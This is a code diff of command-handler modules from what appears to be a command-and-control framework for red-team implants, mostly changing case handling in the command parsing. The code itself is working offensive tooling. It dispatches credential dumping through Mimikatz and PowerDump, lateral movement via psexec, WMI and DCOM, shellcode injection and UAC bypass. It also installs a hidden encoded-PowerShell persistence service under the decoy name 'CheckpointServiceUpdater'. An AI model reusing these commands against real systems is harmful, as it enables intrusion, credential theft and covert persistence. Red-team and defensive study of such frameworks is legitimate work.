elif command.startswith("invoke-psinject"): check_module_loaded("Invoke-PSInject.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-pipekat"): check_module_loaded("Invoke-Pipekat.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-portscan"): check_module_loaded("Invoke-Portscan.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-powerdump"): check_module_loaded("Invoke-PowerDump.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-psexec"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-reflectivepeinjection"): check_module_loaded("Invoke-ReflectivePEInjection.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-reversednslookup"): check_module_loaded("Invoke-ReverseDnsLookup.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-runas"): check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-smblogin"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-smbclient"): check_module_loaded("Invoke-SMBClient.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-smbexec"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-psexec"): check_module_loaded("Invoke-SMBExec.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-shellcode"): check_module_loaded("Invoke-Shellcode.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-sniffer"): check_module_loaded("Invoke-Sniffer.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-sqlquery"): check_module_loaded("Invoke-SqlQuery.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-tater"): check_module_loaded("Invoke-Tater.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-thehash"): check_module_loaded("Invoke-TheHash.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-tokenmanipulation"): check_module_loaded("Invoke-TokenManipulation.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-wmichecker"): check_module_loaded("Invoke-WMIChecker.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-wmicommand"): check_module_loaded("Invoke-WMICommand.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-wscriptbypassuac"): check_module_loaded("Invoke-WScriptBypassUAC.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-winrmsession"): check_module_loaded("Invoke-WinRMSession.ps1", randomuri, user)
|
||||
elif command.startswith("out-minidump"): check_module_loaded("Out-Minidump.ps1", randomuri, user)
|
||||
elif command.startswith("portscan"): check_module_loaded("PortScanner.ps1", randomuri, user)
|
||||
elif command.startswith("powercat"): check_module_loaded("powercat.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-allchecks"): check_module_loaded("PowerUp.ps1", randomuri, user)
|
||||
elif command.startswith("set-lhstokenprivilege"): check_module_loaded("Set-LHSTokenPrivilege.ps1", randomuri, user)
|
||||
elif command.startswith("sharpsocks"): check_module_loaded("SharpSocks.ps1", randomuri, user)
|
||||
elif command.startswith("find-allvulns"): check_module_loaded("Sherlock.ps1", randomuri, user)
|
||||
elif command.startswith("test-adcredential"): check_module_loaded("Test-ADCredential.ps1", randomuri, user)
|
||||
elif command.startswith("new-zipfile"): check_module_loaded("Zippy.ps1", randomuri, user)
|
||||
elif command.startswith("get-netuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-aclscanner"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-dfsshare"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-objectacl"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("add-objectacl"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-domainuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netcomputer"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-domaincomputer"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netuser"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netgroup"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netgroupmember"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netshare"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-sharefinder"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netdomain"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netdomaincontroller"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netforest"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("find-domainshare"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-netforestdomain"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-mapdomaintrust"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-wmireglastloggedon"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-wmiregcachedrdpconnection"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("get-wmiregmounteddrive"): check_module_loaded("powerview.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-wmievent"): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
|
||||
elif command.startswith("remove-wmievent"): check_module_loaded("Invoke-WMIEvent.ps1", randomuri, user)
|
||||
elif command.startswith("invoke-wmi"): check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||
elif command.startswith("get-lapspasswords"): check_module_loaded("Get-LAPSPasswords.ps1", randomuri, user)
|
||||
|
||||
def handle_ps_command(command, user, randomuri, startup, createdaisypayload, createproxypayload):
|
||||
try:
|
||||
check_module_loaded("Stage2-Core.ps1", randomuri, user)
|
||||
|
|
@ -25,25 +131,23 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
|
||||
# alias mapping
|
||||
for alias in ps_alias:
|
||||
if command.lower().strip().startswith(alias[0]):
|
||||
if command.startswith(alias[0]):
|
||||
command.replace(alias[0], alias[1])
|
||||
|
||||
# opsec failures
|
||||
for opsec in ps_opsec:
|
||||
if opsec == command.lower()[:len(opsec)]:
|
||||
if opsec == command[:len(opsec)]:
|
||||
print (Colours.RED)
|
||||
print ("**OPSEC Warning**")
|
||||
impid = get_implantdetails(randomuri)
|
||||
ri = raw_input("Do you want to continue running - %s? (y/N) " % command)
|
||||
if ri.lower() == "n":
|
||||
command = ""
|
||||
return
|
||||
if ri == "":
|
||||
command = ""
|
||||
if ri.lower() == "y":
|
||||
command = command
|
||||
return
|
||||
break
|
||||
|
||||
if ('beacon' in command.lower() and '-beacon' not in command.lower()) or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
||||
if ('beacon' in command and '-beacon' not in command) or 'set-beacon' in command or 'setbeacon' in command:
|
||||
new_sleep = command.replace('set-beacon ', '')
|
||||
new_sleep = new_sleep.replace('setbeacon ', '')
|
||||
new_sleep = new_sleep.replace('beacon ', '').strip()
|
||||
|
|
@ -55,23 +159,23 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
new_task(command, user, randomuri)
|
||||
update_sleep(new_sleep, randomuri)
|
||||
|
||||
elif (command.lower().startswith('label-implant')):
|
||||
elif (command.startswith('label-implant')):
|
||||
label = command.replace('label-implant ', '')
|
||||
update_label(label, randomuri)
|
||||
startup(user)
|
||||
|
||||
elif "searchhelp" in command.lower():
|
||||
searchterm = (command.lower()).replace("searchhelp ","")
|
||||
elif "searchhelp" in command:
|
||||
searchterm = (command).replace("searchhelp ","")
|
||||
import string
|
||||
helpful = string.split(posh_help, '\n')
|
||||
for line in helpful:
|
||||
if searchterm in line.lower():
|
||||
print (line)
|
||||
|
||||
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
||||
elif (command == "back") or (command == "clear"):
|
||||
startup(user)
|
||||
|
||||
elif "install-servicelevel-persistencewithproxy" in command.lower():
|
||||
elif "install-servicelevel-persistencewithproxy" in command:
|
||||
C2 = get_c2server_all()
|
||||
if C2[11] == "":
|
||||
startup(user, "Need to run createproxypayload first")
|
||||
|
|
@ -83,7 +187,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
|
||||
new_task(cmd, user, randomuri)
|
||||
|
||||
elif "install-servicelevel-persistence" in command.lower():
|
||||
elif "install-servicelevel-persistence" in command:
|
||||
C2 = get_c2server_all()
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
||||
"", "", "", "", C2[19], C2[20],
|
||||
|
|
@ -92,14 +196,14 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
cmd = "sc.exe create CPUpdater binpath= 'cmd /c powershell -exec bypass -Noninteractive -windowstyle hidden -e %s' Displayname= CheckpointServiceUpdater start= auto" % (payload)
|
||||
new_task(cmd, user, randomuri)
|
||||
|
||||
elif "remove-servicelevel-persistence" in command.lower():
|
||||
elif "remove-servicelevel-persistence" in command:
|
||||
new_task("sc.exe delete CPUpdater", user, randomuri)
|
||||
|
||||
# psexec lateral movement
|
||||
elif "get-implantworkingdirectory" in command.lower():
|
||||
elif "get-implantworkingdirectory" in command:
|
||||
new_task("pwd", user, randomuri)
|
||||
|
||||
elif "get-system-withproxy" in command.lower():
|
||||
elif "get-system-withproxy" in command:
|
||||
C2 = get_c2server_all()
|
||||
if C2[11] == "":
|
||||
startup(user, "Need to run createproxypayload first")
|
||||
|
|
@ -115,7 +219,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
cmd = "sc.exe delete CPUpdaterMisc"
|
||||
new_task(cmd, user, randomuri)
|
||||
|
||||
elif "get-system-withdaisy" in command.lower():
|
||||
elif "get-system-withdaisy" in command:
|
||||
C2 = get_c2server_all()
|
||||
daisyname = raw_input("Payload name required: ")
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
||||
|
|
@ -127,7 +231,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
cmd = "sc.exe delete CPUpdaterMisc"
|
||||
new_task(cmd, user, randomuri)
|
||||
|
||||
elif "get-system" in command.lower():
|
||||
elif "get-system" in command:
|
||||
C2 = get_c2server_all()
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
||||
"", "", "", "", C2[19], C2[20],
|
||||
|
|
@ -140,7 +244,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
cmd = "sc.exe delete CPUpdaterMisc"
|
||||
new_task(cmd, user, randomuri)
|
||||
|
||||
elif "quit" in command.lower():
|
||||
elif "quit" in command:
|
||||
ri = raw_input("Are you sure you want to quit? (Y/n) ")
|
||||
if ri.lower() == "n":
|
||||
startup(user)
|
||||
|
|
@ -149,7 +253,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
if ri.lower() == "y":
|
||||
sys.exit(0)
|
||||
|
||||
elif "invoke-psexecproxypayload" in command.lower():
|
||||
elif "invoke-psexecproxypayload" in command:
|
||||
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
|
|
@ -160,7 +264,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
else:
|
||||
startup(user, "Need to run createproxypayload first")
|
||||
|
||||
elif "invoke-psexecdaisypayload" in command.lower():
|
||||
elif "invoke-psexecdaisypayload" in command:
|
||||
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
|
||||
daisyname = raw_input("Payload name required: ")
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
||||
|
|
@ -172,7 +276,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
else:
|
||||
startup(user, "Need to run createdaisypayload first")
|
||||
|
||||
elif "invoke-psexecpayload" in command.lower():
|
||||
elif "invoke-psexecpayload" in command:
|
||||
check_module_loaded("Invoke-PsExec.ps1", randomuri, user)
|
||||
C2 = get_c2server_all()
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
||||
|
|
@ -185,7 +289,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
new_task(cmd, user, randomuri)
|
||||
|
||||
# wmi lateral movement
|
||||
elif "invoke-wmiproxypayload" in command.lower():
|
||||
elif "invoke-wmiproxypayload" in command:
|
||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
|
|
@ -196,7 +300,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
else:
|
||||
startup(user, "Need to run createproxypayload first")
|
||||
|
||||
elif "invoke-wmidaisypayload" in command.lower():
|
||||
elif "invoke-wmidaisypayload" in command:
|
||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||
daisyname = raw_input("Name required: ")
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
||||
|
|
@ -208,7 +312,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
else:
|
||||
startup(user, "Need to run createdaisypayload first")
|
||||
|
||||
elif "invoke-wmipayload" in command.lower():
|
||||
elif "invoke-wmipayload" in command:
|
||||
check_module_loaded("Invoke-WMIExec.ps1", randomuri, user)
|
||||
C2 = get_c2server_all()
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
||||
|
|
@ -221,7 +325,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
new_task(cmd, user, randomuri)
|
||||
|
||||
# dcom lateral movement
|
||||
elif "invoke-dcomproxypayload" in command.lower():
|
||||
elif "invoke-dcomproxypayload" in command:
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,"Proxy"))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,"Proxy"), "r") as p: payload = p.read()
|
||||
params = re.compile("invoke-wmiproxypayload ", re.IGNORECASE)
|
||||
|
|
@ -233,7 +337,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
else:
|
||||
startup(user, "Need to run createproxypayload first")
|
||||
|
||||
elif "invoke-dcomdaisypayload" in command.lower():
|
||||
elif "invoke-dcomdaisypayload" in command:
|
||||
daisyname = raw_input("Name required: ")
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
||||
|
|
@ -244,7 +348,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
else:
|
||||
startup(user, "Need to run createdaisypayload first")
|
||||
|
||||
elif "invoke-dcompayload" in command.lower():
|
||||
elif "invoke-dcompayload" in command:
|
||||
C2 = get_c2server_all()
|
||||
newPayload = Payloads(C2[5], C2[2], C2[1], C2[3], C2[8], "",
|
||||
"", "", "", "", C2[19], C2[20],
|
||||
|
|
@ -256,7 +360,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
new_task(pscommand, user, randomuri)
|
||||
|
||||
# runas payloads
|
||||
elif "invoke-runasdaisypayload" in command.lower():
|
||||
elif "invoke-runasdaisypayload" in command:
|
||||
daisyname = raw_input("Name required: ")
|
||||
if os.path.isfile(("%s%spayload.bat" % (PayloadsDirectory,daisyname))):
|
||||
with open("%s%spayload.bat" % (PayloadsDirectory,daisyname), "r") as p: payload = p.read()
|
||||
|
|
@ -271,7 +375,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
else:
|
||||
startup(user, "Need to run createdaisypayload first")
|
||||
|
||||
elif "invoke-runasproxypayload" in command.lower():
|
||||
elif "invoke-runasproxypayload" in command:
|
||||
C2 = get_c2server_all()
|
||||
if C2[11] == "":
|
||||
startup(user, "Need to run createproxypayload first")
|
||||
|
|
@ -290,7 +394,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
|
||||
new_task(pscommand, user, randomuri)
|
||||
|
||||
elif "invoke-runaspayload" in command.lower():
|
||||
elif "invoke-runaspayload" in command:
|
||||
check_module_loaded("Invoke-RunAs.ps1", randomuri, user)
|
||||
check_module_loaded("NamedPipe.ps1", randomuri, user)
|
||||
params = re.compile("invoke-runaspayload ", re.IGNORECASE)
|
||||
|
|
@ -299,35 +403,35 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
pscommand = "invoke-runas %s -command C:\\Windows\\System32\\WindowsPowershell\\v1.0\\powershell.exe -Args \" -e %s\"" % (params,base64.b64encode(pipe.encode('UTF-16LE')))
|
||||
new_task(pscommand, user, randomuri)
|
||||
|
||||
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
||||
elif command == "help" or command == "?":
|
||||
print (posh_help)
|
||||
elif command.lower() == "help 1":
|
||||
elif command == "help 1":
|
||||
print (posh_help1)
|
||||
elif command.lower() == "help 2":
|
||||
elif command == "help 2":
|
||||
print (posh_help2)
|
||||
elif command.lower() == "help 3":
|
||||
elif command == "help 3":
|
||||
print (posh_help3)
|
||||
elif command.lower() == "help 4":
|
||||
elif command == "help 4":
|
||||
print (posh_help4)
|
||||
elif command.lower() == "help 5":
|
||||
elif command == "help 5":
|
||||
print (posh_help5)
|
||||
elif command.lower() == "help 6":
|
||||
elif command == "help 6":
|
||||
print (posh_help6)
|
||||
elif command.lower() == "help 7":
|
||||
elif command == "help 7":
|
||||
print (posh_help7)
|
||||
elif command.lower() == "help 8":
|
||||
elif command == "help 8":
|
||||
print (posh_help8)
|
||||
|
||||
elif "get-pid" in command.lower():
|
||||
elif "get-pid" in command:
|
||||
pid = get_implantdetails(randomuri)
|
||||
print (pid[8])
|
||||
|
||||
elif "upload-file" in command.lower():
|
||||
elif "upload-file" in command:
|
||||
source = ""
|
||||
destination = ""
|
||||
s = ""
|
||||
nothidden = False
|
||||
if command.strip().lower() == "upload-file":
|
||||
if command.lower() == "upload-file":
|
||||
source = readfile_with_completion("Location of file to upload: ")
|
||||
while not os.path.isfile(source):
|
||||
print("File does not exist: %s" % source)
|
||||
|
|
@ -357,7 +461,7 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
print ("Error with source file: %s" % e)
|
||||
traceback.print_exc()
|
||||
|
||||
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
||||
elif "kill-implant" in command or "exit" in command:
|
||||
impid = get_implantdetails(randomuri)
|
||||
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
||||
if ri.lower() == "n":
|
||||
|
|
@ -369,34 +473,34 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
new_task("exit", user, randomuri)
|
||||
kill_implant(randomuri)
|
||||
|
||||
elif "unhide-implant" in command.lower():
|
||||
elif "unhide-implant" in command:
|
||||
unhide_implant(randomuri)
|
||||
|
||||
elif "hide-implant" in command.lower():
|
||||
elif "hide-implant" in command:
|
||||
kill_implant(randomuri)
|
||||
|
||||
elif "migrate" in command[:7].lower():
|
||||
elif command.startswith("migrate"):
|
||||
params = re.compile("migrate", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
migrate(randomuri, user, params)
|
||||
|
||||
elif "loadmoduleforce" in command.lower():
|
||||
elif "loadmoduleforce" in command:
|
||||
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
check_module_loaded(params, randomuri, user, force=True)
|
||||
|
||||
elif "loadmodule" in command.lower():
|
||||
elif "loadmodule" in command:
|
||||
params = re.compile("loadmodule ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
check_module_loaded(params, randomuri, user)
|
||||
|
||||
elif "invoke-daisychain" in command.lower():
|
||||
elif "invoke-daisychain" in command:
|
||||
check_module_loaded("Invoke-DaisyChain.ps1", randomuri, user)
|
||||
urls = get_allurls()
|
||||
new_task("%s -URLs '%s'" % (command,urls), user, randomuri)
|
||||
print ("Now use createdaisypayload")
|
||||
|
||||
elif "inject-shellcode" in command.lower():
|
||||
elif "inject-shellcode" in command:
|
||||
params = re.compile("inject-shellcode", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
check_module_loaded("Inject-Shellcode.ps1", randomuri, user)
|
||||
|
|
@ -414,21 +518,21 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
except Exception as e:
|
||||
print ("Error loading file: %s" % e)
|
||||
|
||||
elif "listmodules" in command.lower():
|
||||
elif "listmodules" in command:
|
||||
print (os.listdir("%s/Modules/" % POSHDIR))
|
||||
|
||||
elif "modulesloaded" in command.lower():
|
||||
elif "modulesloaded" in command:
|
||||
ml = get_implantdetails(randomuri)
|
||||
print (ml[14])
|
||||
|
||||
elif (command.lower() == "ps") or (command.lower() == "ps "):
|
||||
elif command == "ps":
|
||||
new_task("get-processlist", user, randomuri)
|
||||
|
||||
elif (command.lower() == "hashdump") or (command.lower() == "hashdump "):
|
||||
elif command == "hashdump":
|
||||
check_module_loaded("Invoke-Mimikatz.ps1", randomuri, user)
|
||||
new_task("Invoke-Mimikatz -Command '\"lsadump::sam\"'", user, randomuri)
|
||||
|
||||
elif (command.lower() == "sharpsocks") or (command.lower() == "sharpsocks "):
|
||||
elif command == "sharpsocks":
|
||||
check_module_loaded("SharpSocks.ps1", randomuri, user)
|
||||
import string
|
||||
from random import choice
|
||||
|
|
@ -441,21 +545,21 @@ def handle_ps_command(command, user, randomuri, startup, createdaisypayload, cre
|
|||
print ("git clone https://github.com/nettitude/SharpSocks.git")
|
||||
print ("SharpSocksServerTestApp.exe -c %s -k %s -l http://IPADDRESS:8080" % (channel,sharpkey))
|
||||
|
||||
elif (command.lower() == "history") or command.lower() == "history ":
|
||||
elif command == "history":
|
||||
startup(user, get_history())
|
||||
|
||||
elif "reversedns" in command.lower():
|
||||
elif "reversedns" in command:
|
||||
params = re.compile("reversedns ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
new_task("[System.Net.Dns]::GetHostEntry(\"%s\")" % params, user, randomuri)
|
||||
|
||||
elif "createdaisypayload" in command.lower():
|
||||
elif "createdaisypayload" in command:
|
||||
createdaisypayload(user, startup)
|
||||
|
||||
elif "createproxypayload" in command.lower():
|
||||
elif "createproxypayload" in command:
|
||||
createproxypayload(user, startup)
|
||||
|
||||
elif "createnewpayload" in command.lower():
|
||||
elif "createnewpayload" in command:
|
||||
createproxypayload(user, startup)
|
||||
|
||||
else:
|
||||
|
|
|
|||
32
PyHandler.py
32
PyHandler.py
|
|
@ -12,10 +12,10 @@ from Utils import argp
|
|||
def handle_py_command(command, user, randomuri, startup):
|
||||
# alias mapping
|
||||
for alias in py_alias:
|
||||
if alias[0] == command.lower()[:len(command.rstrip())]:
|
||||
if alias[0] == command[:len(command.rstrip())]:
|
||||
command = alias[1]
|
||||
|
||||
if 'beacon' in command.lower() or 'set-beacon' in command.lower() or 'setbeacon' in command.lower():
|
||||
if 'beacon' in command or 'set-beacon' in command or 'setbeacon' in command:
|
||||
new_sleep = command.replace('set-beacon ', '')
|
||||
new_sleep = new_sleep.replace('setbeacon ', '')
|
||||
new_sleep = new_sleep.replace('beacon ', '').strip()
|
||||
|
|
@ -28,33 +28,33 @@ def handle_py_command(command, user, randomuri, startup):
|
|||
new_task(command, user, randomuri)
|
||||
update_sleep(new_sleep, randomuri)
|
||||
|
||||
elif (command.lower().startswith('label-implant')):
|
||||
elif (command.startswith('label-implant')):
|
||||
label = command.replace('label-implant ', '')
|
||||
update_label(label, randomuri)
|
||||
startup(user)
|
||||
|
||||
elif "searchhelp" in command.lower():
|
||||
searchterm = (command.lower()).replace("searchhelp ","")
|
||||
elif "searchhelp" in command:
|
||||
searchterm = (command).replace("searchhelp ","")
|
||||
import string
|
||||
helpful = string.split(py_help1, '\n')
|
||||
for line in helpful:
|
||||
if searchterm in line.lower():
|
||||
print (line)
|
||||
|
||||
elif "unhide-implant" in command.lower():
|
||||
elif "unhide-implant" in command:
|
||||
unhide_implant(randomuri)
|
||||
|
||||
elif "hide-implant" in command.lower():
|
||||
elif "hide-implant" in command:
|
||||
kill_implant(randomuri)
|
||||
|
||||
elif command.lower() == 'sai' or command.lower() == 'sai ':
|
||||
elif command == 'sai' or command == 'sai ':
|
||||
new_task('startanotherimplant', user, randomuri)
|
||||
|
||||
elif "upload-file" in command.lower():
|
||||
elif "upload-file" in command:
|
||||
source = ""
|
||||
destination = ""
|
||||
s = ""
|
||||
if command.strip().lower() == "upload-file":
|
||||
if command.lower() == "upload-file":
|
||||
source = readfile_with_completion("Location of file to upload: ")
|
||||
while not os.path.isfile(source):
|
||||
print("File does not exist: %s" % source)
|
||||
|
|
@ -80,24 +80,24 @@ def handle_py_command(command, user, randomuri, startup):
|
|||
print ("Error with source file: %s" % e)
|
||||
traceback.print_exc()
|
||||
|
||||
elif command.lower() == "help" or command == "?" or command.lower() == "help ":
|
||||
elif command == "help" or command == "?" or command == "help ":
|
||||
print (py_help1)
|
||||
|
||||
elif "loadmoduleforce" in command.lower():
|
||||
elif "loadmoduleforce" in command:
|
||||
params = re.compile("loadmoduleforce ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
check_module_loaded(params, randomuri, user, force=True)
|
||||
|
||||
elif "loadmodule" in command.lower():
|
||||
elif "loadmodule" in command:
|
||||
params = re.compile("loadmodule ", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
check_module_loaded(params, randomuri, user)
|
||||
|
||||
elif 'get-screenshot' in command.lower():
|
||||
elif 'get-screenshot' in command:
|
||||
taskcmd = "screencapture -x /tmp/s;base64 /tmp/s;rm /tmp/s"
|
||||
new_task(taskcmd, user, randomuri)
|
||||
|
||||
elif "kill-implant" in command.lower() or "exit" in command.lower():
|
||||
elif "kill-implant" in command or "exit" in command:
|
||||
impid = get_implantdetails(randomuri)
|
||||
ri = raw_input("Are you sure you want to terminate the implant ID %s? (Y/n) " % impid[0])
|
||||
if ri.lower() == "n":
|
||||
|
|
@ -114,7 +114,7 @@ def handle_py_command(command, user, randomuri, startup):
|
|||
elif (command == "back") or (command == "clear") or (command == "back ") or (command == "clear "):
|
||||
startup(user)
|
||||
|
||||
elif "linuxprivchecker" in command.lower():
|
||||
elif "linuxprivchecker" in command:
|
||||
params = re.compile("linuxprivchecker", re.IGNORECASE)
|
||||
params = params.sub("", command)
|
||||
module = open("%slinuxprivchecker.py" % ModulesDirectory, 'r').read()
|
||||
|
|
|
|||
|
|
@ -3,12 +3,21 @@ from Alias import cs_alias, cs_replace
|
|||
from Colours import Colours
|
||||
from Utils import randomuri, validate_sleep_time
|
||||
from DB import new_task, update_sleep, update_label, unhide_implant, kill_implant, get_implantdetails, get_pid
|
||||
from AutoLoads import check_module_loaded, run_autoloads
|
||||
from AutoLoads import check_module_loaded
|
||||
from Help import sharp_help1
|
||||
from Config import ModulesDirectory, POSHDIR
|
||||
from Core import readfile_with_completion
|
||||
from Utils import argp, load_file
|
||||
|
||||
def run_autoloads(command, randomuri, user):
|
||||
if command.startswith("run-exe seatbelt"): check_module_loaded("Seatbelt.exe", randomuri, user)
|
||||
elif command.startswith("run-exe sharpup"): check_module_loaded("SharpUp.exe", randomuri, user)
|
||||
elif command.startswith("run-exe safetydump"): check_module_loaded("SafetyDump.exe", randomuri, user)
|
||||
elif command.startswith("run-exe rubeus"): check_module_loaded("Rubeus.exe", randomuri, user)
|
||||
elif command.startswith("run-exe sharpview"): check_module_loaded("SharpView.exe", randomuri, user)
|
||||
elif command.startswith("run-exe watson"): check_module_loaded("Watson.exe", randomuri, user)
|
||||
elif command.startswith("run-exe sharphound"): check_module_loaded("SharpHound.exe", randomuri, user)
|
||||
|
||||
def handle_sharp_command(command, user, randomuri, startup):
|
||||
try:
|
||||
check_module_loaded("Stage2-Core.exe", randomuri, user)
|
||||
|
|
@ -17,29 +26,29 @@ def handle_sharp_command(command, user, randomuri, startup):
|
|||
|
||||
# alias mapping
|
||||
for alias in cs_alias:
|
||||
if alias[0] == command.lower()[:len(command.rstrip())]:
|
||||
if alias[0] == command[:len(command.rstrip())]:
|
||||
command = alias[1]
|
||||
|
||||
# alias replace
|
||||
for alias in cs_replace:
|
||||
if command.lower().strip().startswith(alias[0]):
|
||||
if command.startswith(alias[0]):
|
||||
command = command.replace(alias[0], alias[1])
|
||||
|
||||
run_autoloads(command, randomuri, user)
|
||||
|
||||
if "searchhelp" in command.lower():
|
||||
searchterm = (command.lower()).replace("searchhelp ","")
|
||||
if "searchhelp" in command:
|
||||
searchterm = (command).replace("searchhelp ","")
|
||||
import string
|
||||
helpful = string.split(sharp_help1, '\n')
|
||||
for line in helpful:
|
||||
